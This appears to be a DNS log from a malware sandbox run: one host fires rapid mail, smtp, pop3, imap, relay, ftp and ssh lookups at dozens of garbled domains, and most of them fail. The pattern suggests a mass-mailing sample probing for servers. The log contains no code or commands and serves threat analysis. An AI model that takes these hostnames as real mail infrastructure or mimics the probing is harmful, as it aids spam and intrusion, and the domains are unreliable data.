Nov 30, 2023 11:23:29.734767914 CET	1.1.1.1	192.168.2.4	0x2b60	Name error (3)	mail.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.735162973 CET	1.1.1.1	192.168.2.4	0x9e57	Name error (3)	mailgate.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.735218048 CET	1.1.1.1	192.168.2.4	0x16d2	Name error (3)	smtp.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.739114046 CET	1.1.1.1	192.168.2.4	0x59d5	Name error (3)	ftp.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.741264105 CET	1.1.1.1	192.168.2.4	0x5e10	Name error (3)	smtp.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.742944002 CET	1.1.1.1	192.168.2.4	0x2a34	Name error (3)	pop3.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.745403051 CET	1.1.1.1	192.168.2.4	0xae9d	Name error (3)	smtp.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.745419979 CET	1.1.1.1	192.168.2.4	0x7b48	Name error (3)	ftp.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.746918917 CET	1.1.1.1	192.168.2.4	0x47bf	Name error (3)	smtp.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.749286890 CET	1.1.1.1	192.168.2.4	0x58e1	Name error (3)	mail.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.765744925 CET	1.1.1.1	192.168.2.4	0x9ca9	Name error (3)	smtp.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.776285887 CET	1.1.1.1	192.168.2.4	0x83f1	Name error (3)	mail.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.788609982 CET	1.1.1.1	192.168.2.4	0xdab3	Name error (3)	ftp.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.807779074 CET	1.1.1.1	192.168.2.4	0x7004	Name error (3)	mail.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.808566093 CET	1.1.1.1	192.168.2.4	0x5c88	Name error (3)	ssh.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.812952995 CET	1.1.1.1	192.168.2.4	0xe6d4	Name error (3)	mailgate.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.837388992 CET	1.1.1.1	192.168.2.4	0xf9ad	Name error (3)	ssh.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.837634087 CET	1.1.1.1	192.168.2.4	0xf3b	Name error (3)	ssh.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.846152067 CET	1.1.1.1	192.168.2.4	0xfced	Name error (3)	ssh.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.853868008 CET	1.1.1.1	192.168.2.4	0xbf27	Name error (3)	smtp.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.854881048 CET	1.1.1.1	192.168.2.4	0x596c	Name error (3)	ssh.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.855773926 CET	1.1.1.1	192.168.2.4	0x6346	Name error (3)	ssh.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.861268044 CET	1.1.1.1	192.168.2.4	0x4f67	Name error (3)	ssh.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.883371115 CET	1.1.1.1	192.168.2.4	0x6797	Name error (3)	mailgate.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.884612083 CET	1.1.1.1	192.168.2.4	0xa517	Name error (3)	relay.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.884937048 CET	1.1.1.1	192.168.2.4	0xe2b3	Name error (3)	relay.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.889666080 CET	1.1.1.1	192.168.2.4	0x10ed	Name error (3)	relay.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.892296076 CET	1.1.1.1	192.168.2.4	0x635b	Name error (3)	ssh.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.915050030 CET	1.1.1.1	192.168.2.4	0x5af7	Name error (3)	smtp.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.917037010 CET	1.1.1.1	192.168.2.4	0xda47	Name error (3)	mail.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.917747974 CET	1.1.1.1	192.168.2.4	0x12d0	Name error (3)	ftp.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.934396029 CET	1.1.1.1	192.168.2.4	0x6033	Name error (3)	relay.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.936427116 CET	1.1.1.1	192.168.2.4	0x5feb	Name error (3)	pop.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.939966917 CET	1.1.1.1	192.168.2.4	0x9e29	Name error (3)	smtp.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.942847013 CET	1.1.1.1	192.168.2.4	0x32b8	Name error (3)	relay.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.962754965 CET	1.1.1.1	192.168.2.4	0xf547	Name error (3)	pop.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.962774038 CET	1.1.1.1	192.168.2.4	0x1030	Name error (3)	ftp.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.971548080 CET	1.1.1.1	192.168.2.4	0xd272	Name error (3)	relay.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.977768898 CET	1.1.1.1	192.168.2.4	0x401d	Name error (3)	mailgate.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.977802038 CET	1.1.1.1	192.168.2.4	0x401d	Name error (3)	mailgate.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.981064081 CET	1.1.1.1	192.168.2.4	0x89b5	Name error (3)	relay.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.983272076 CET	1.1.1.1	192.168.2.4	0xf237	Name error (3)	imap.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.987637043 CET	1.1.1.1	192.168.2.4	0xf224	Name error (3)	smtp.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.989954948 CET	1.1.1.1	192.168.2.4	0x6bc8	Name error (3)	relay.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.003817081 CET	1.1.1.1	192.168.2.4	0xf0ea	Name error (3)	mail.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.005887985 CET	1.1.1.1	192.168.2.4	0xda47	Name error (3)	mail.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.006635904 CET	1.1.1.1	192.168.2.4	0x12d0	Name error (3)	ftp.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.012887955 CET	1.1.1.1	192.168.2.4	0xc2e3	Name error (3)	ssh.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.026431084 CET	1.1.1.1	192.168.2.4	0xc2cd	Name error (3)	relay.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.042762041 CET	1.1.1.1	192.168.2.4	0xa88e	Name error (3)	ssh.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.055402994 CET	1.1.1.1	192.168.2.4	0x1ad2	Name error (3)	relay.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.057126045 CET	1.1.1.1	192.168.2.4	0x157d	Name error (3)	relay.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.057133913 CET	1.1.1.1	192.168.2.4	0xad07	Name error (3)	pop.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.060606956 CET	1.1.1.1	192.168.2.4	0x89cc	Name error (3)	pop.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.066808939 CET	1.1.1.1	192.168.2.4	0xfd3d	Name error (3)	imap.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.073122978 CET	1.1.1.1	192.168.2.4	0x52f7	Name error (3)	pop.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.080111980 CET	1.1.1.1	192.168.2.4	0x28a1	Name error (3)	relay.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.091147900 CET	1.1.1.1	192.168.2.4	0x107a	Name error (3)	imap.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.095536947 CET	1.1.1.1	192.168.2.4	0xf710	Name error (3)	relay.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.095690012 CET	1.1.1.1	192.168.2.4	0xc2e3	Name error (3)	ssh.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.105086088 CET	1.1.1.1	192.168.2.4	0xe96a	Name error (3)	imap.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.123215914 CET	1.1.1.1	192.168.2.4	0x18b3	Name error (3)	pop.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.126836061 CET	1.1.1.1	192.168.2.4	0xc2cd	Name error (3)	relay.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.127760887 CET	1.1.1.1	192.168.2.4	0xf0ea	Name error (3)	mail.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.137053967 CET	1.1.1.1	192.168.2.4	0xb4ed	Name error (3)	imap.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.152061939 CET	1.1.1.1	192.168.2.4	0xc778	Name error (3)	pop.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.176039934 CET	1.1.1.1	192.168.2.4	0xf710	Name error (3)	relay.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.179477930 CET	1.1.1.1	192.168.2.4	0xf4d0	Name error (3)	imap.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.186162949 CET	1.1.1.1	192.168.2.4	0x4911	Name error (3)	relay.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.188636065 CET	1.1.1.1	192.168.2.4	0x5001	Name error (3)	imap.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.192004919 CET	1.1.1.1	192.168.2.4	0xa789	Name error (3)	pop.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.208846092 CET	1.1.1.1	192.168.2.4	0x9b1e	Name error (3)	pop3.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.222734928 CET	1.1.1.1	192.168.2.4	0x9070	Name error (3)	imap.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.232151985 CET	1.1.1.1	192.168.2.4	0xf8e6	Name error (3)	pop3.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.251912117 CET	1.1.1.1	192.168.2.4	0xa789	Name error (3)	pop.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.316458941 CET	1.1.1.1	192.168.2.4	0x6e3e	Name error (3)	pop3.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.323343039 CET	1.1.1.1	192.168.2.4	0xb53e	Name error (3)	mailgate.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.352214098 CET	1.1.1.1	192.168.2.4	0x735	Name error (3)	pop.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.355892897 CET	1.1.1.1	192.168.2.4	0xcdd4	Name error (3)	imap.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.362711906 CET	1.1.1.1	192.168.2.4	0x9784	Name error (3)	ssh.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.362730026 CET	1.1.1.1	192.168.2.4	0x9784	Name error (3)	ssh.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.387394905 CET	1.1.1.1	192.168.2.4	0x7482	Name error (3)	relay.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.408562899 CET	1.1.1.1	192.168.2.4	0x8710	Name error (3)	smtp.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.408652067 CET	1.1.1.1	192.168.2.4	0x6a4	Name error (3)	smtp.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.423990965 CET	1.1.1.1	192.168.2.4	0xf93e	Name error (3)	8280l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.425952911 CET	1.1.1.1	192.168.2.4	0x9533	Name error (3)	smtp.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.427366972 CET	1.1.1.1	192.168.2.4	0x1c35	Name error (3)	mailgate.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.428383112 CET	1.1.1.1	192.168.2.4	0x5378	Name error (3)	n.l.pp.el.mki6aok.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.433080912 CET	1.1.1.1	192.168.2.4	0x7084	Name error (3)	pop.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.441036940 CET	1.1.1.1	192.168.2.4	0x735	Name error (3)	pop.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.443825006 CET	1.1.1.1	192.168.2.4	0x4428	Name error (3)	smtp.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.445014000 CET	1.1.1.1	192.168.2.4	0xc1e3	Name error (3)	smtp.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.445760965 CET	1.1.1.1	192.168.2.4	0x51ed	Name error (3)	mailgate.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.447062969 CET	1.1.1.1	192.168.2.4	0x178f	Name error (3)	pop3.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.450565100 CET	1.1.1.1	192.168.2.4	0x2821	Name error (3)	smtp.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.450951099 CET	1.1.1.1	192.168.2.4	0xd276	Name error (3)	8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.452069998 CET	1.1.1.1	192.168.2.4	0x3635	Name error (3)	pop3.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.455513954 CET	1.1.1.1	192.168.2.4	0x467f	Name error (3)	mailgate.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.457062006 CET	1.1.1.1	192.168.2.4	0x3153	Name error (3)	pop3.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.466378927 CET	1.1.1.1	192.168.2.4	0x6fc9	Name error (3)	mailgate.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.474286079 CET	1.1.1.1	192.168.2.4	0xcdd4	Name error (3)	imap.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.479007959 CET	1.1.1.1	192.168.2.4	0x1788	Name error (3)	smtp.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.492528915 CET	1.1.1.1	192.168.2.4	0x2c93	Name error (3)	mailgate.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.499020100 CET	1.1.1.1	192.168.2.4	0x77fe	Name error (3)	mailgate.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.507318020 CET	1.1.1.1	192.168.2.4	0x6c9f	Name error (3)	n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.508120060 CET	1.1.1.1	192.168.2.4	0xae58	Name error (3)	hoiocil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.512096882 CET	1.1.1.1	192.168.2.4	0x22c4	Name error (3)	imap.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.515757084 CET	1.1.1.1	192.168.2.4	0x696e	Name error (3)	pop3.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.522563934 CET	1.1.1.1	192.168.2.4	0xea01	Name error (3)	pop3.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.524095058 CET	1.1.1.1	192.168.2.4	0x83	Name error (3)	smtp.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.527880907 CET	1.1.1.1	192.168.2.4	0xd523	Name error (3)	ccrwatereacee.unk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.531769037 CET	1.1.1.1	192.168.2.4	0xbbe	Name error (3)	smtp.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.545680046 CET	1.1.1.1	192.168.2.4	0x557b	Name error (3)	mailgate.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.556180000 CET	1.1.1.1	192.168.2.4	0x7f75	Name error (3)	ftp.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.556215048 CET	1.1.1.1	192.168.2.4	0x7f75	Name error (3)	ftp.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.558374882 CET	1.1.1.1	192.168.2.4	0x7160	Name error (3)	hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.564649105 CET	1.1.1.1	192.168.2.4	0xa5ae	Name error (3)	relay.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.570440054 CET	1.1.1.1	192.168.2.4	0x696e	Name error (3)	pop3.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.580961943 CET	1.1.1.1	192.168.2.4	0xea01	Name error (3)	pop3.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.582005978 CET	1.1.1.1	192.168.2.4	0x4a58	Name error (3)	aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.583492994 CET	1.1.1.1	192.168.2.4	0x3280	Name error (3)	ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.584367990 CET	1.1.1.1	192.168.2.4	0x2e12	Name error (3)	mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.585047007 CET	1.1.1.1	192.168.2.4	0x1386	Name error (3)	mr.r.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.593071938 CET	1.1.1.1	192.168.2.4	0x592a	Name error (3)	smtp.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.614069939 CET	1.1.1.1	192.168.2.4	0x247d	Name error (3)	aieicod0003l.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.615712881 CET	1.1.1.1	192.168.2.4	0xa227	Name error (3)	mail.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.615747929 CET	1.1.1.1	192.168.2.4	0xa227	Name error (3)	mail.22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.655023098 CET	1.1.1.1	192.168.2.4	0xe66a	Name error (3)	relay.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.672108889 CET	1.1.1.1	192.168.2.4	0x396c	Name error (3)	pop3.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.708784103 CET	1.1.1.1	192.168.2.4	0x87c0	Name error (3)	x02l.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.724929094 CET	1.1.1.1	192.168.2.4	0xf027	Name error (3)	relay.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.726525068 CET	1.1.1.1	192.168.2.4	0xbfb1	Name error (3)	pop3.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.755470037 CET	1.1.1.1	192.168.2.4	0x53a	Name error (3)	ftp.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.773371935 CET	1.1.1.1	192.168.2.4	0x71ad	Name error (3)	pop.noweco.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.789836884 CET	1.1.1.1	192.168.2.4	0xa127	Name error (3)	mailgate.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.803625107 CET	1.1.1.1	192.168.2.4	0x168a	No error (0)	g.sil.com	sil.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:30.803625107 CET	1.1.1.1	192.168.2.4	0x168a	No error (0)	sil.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.815671921 CET	1.1.1.1	192.168.2.4	0x304f	Name error (3)	8708aib.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.825408936 CET	1.1.1.1	192.168.2.4	0x82e9	No error (0)	a5a.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.833441973 CET	1.1.1.1	192.168.2.4	0xaaf7	Name error (3)	x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.834717989 CET	1.1.1.1	192.168.2.4	0x2980	Name error (3)	mail.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.835361004 CET	1.1.1.1	192.168.2.4	0xdb06	Name error (3)	relay.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.840548038 CET	1.1.1.1	192.168.2.4	0x19	Name error (3)	ftp.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.879755974 CET	1.1.1.1	192.168.2.4	0x82e9	No error (0)	a5a.com			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.880748034 CET	1.1.1.1	192.168.2.4	0xa127	Name error (3)	mailgate.vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.887166023 CET	1.1.1.1	192.168.2.4	0xb8fa	No error (0)	a5a.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.892405033 CET	1.1.1.1	192.168.2.4	0xa12a	Name error (3)	mail.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.943666935 CET	1.1.1.1	192.168.2.4	0xd31d	Name error (3)	8708aib.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.946382046 CET	1.1.1.1	192.168.2.4	0x23b	No error (0)	g.sil.com	sil.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:30.946382046 CET	1.1.1.1	192.168.2.4	0x23b	No error (0)	sil.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.949136972 CET	1.1.1.1	192.168.2.4	0xb8fa	No error (0)	a5a.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.955581903 CET	1.1.1.1	192.168.2.4	0xcc18	Name error (3)	relay.jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.960326910 CET	1.1.1.1	192.168.2.4	0x9f87	Name error (3)	ssh.8280l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.974111080 CET	1.1.1.1	192.168.2.4	0x415b	Name error (3)	ssh.n.l.pp.el.mki6aok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.985668898 CET	1.1.1.1	192.168.2.4	0xec87	Name error (3)	relay.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.022536993 CET	1.1.1.1	192.168.2.4	0x9270	Name error (3)	ftp.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.059093952 CET	1.1.1.1	192.168.2.4	0x9720	Name error (3)	ftp.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.059128046 CET	1.1.1.1	192.168.2.4	0x8c21	Name error (3)	ftp.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.059505939 CET	1.1.1.1	192.168.2.4	0x64cc	Name error (3)	mail.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.076544046 CET	1.1.1.1	192.168.2.4	0xca92	No error (0)	sil.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.087394953 CET	1.1.1.1	192.168.2.4	0xf4c6	Name error (3)	mailgate.reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.091759920 CET	1.1.1.1	192.168.2.4	0x9f52	Name error (3)	ftp.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.100353003 CET	1.1.1.1	192.168.2.4	0xfd1	Name error (3)	nc.usoxekeovca.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:31.100999117 CET	1.1.1.1	192.168.2.4	0x62c6	Name error (3)	relay.gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.109822035 CET	1.1.1.1	192.168.2.4	0x28b9	Name error (3)	mail.mr.r.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.113091946 CET	1.1.1.1	192.168.2.4	0xb233	Name error (3)	mail.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.115778923 CET	1.1.1.1	192.168.2.4	0xcad7	Name error (3)	ssh.hoiocil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.144224882 CET	1.1.1.1	192.168.2.4	0x712	Name error (3)	ssh.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.155699015 CET	1.1.1.1	192.168.2.4	0x95b2	Name error (3)	ssh.ccrwatereacee.unk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.213493109 CET	1.1.1.1	192.168.2.4	0x4581	Name error (3)	ftp.x02l.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.216253042 CET	1.1.1.1	192.168.2.4	0xefc8	Name error (3)	relay.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:31.242386103 CET	1.1.1.1	192.168.2.4	0x8584	Name error (3)	mail.aieicod0003l.co.uk	none	none	A (IP address)	IN (0x0001)	false
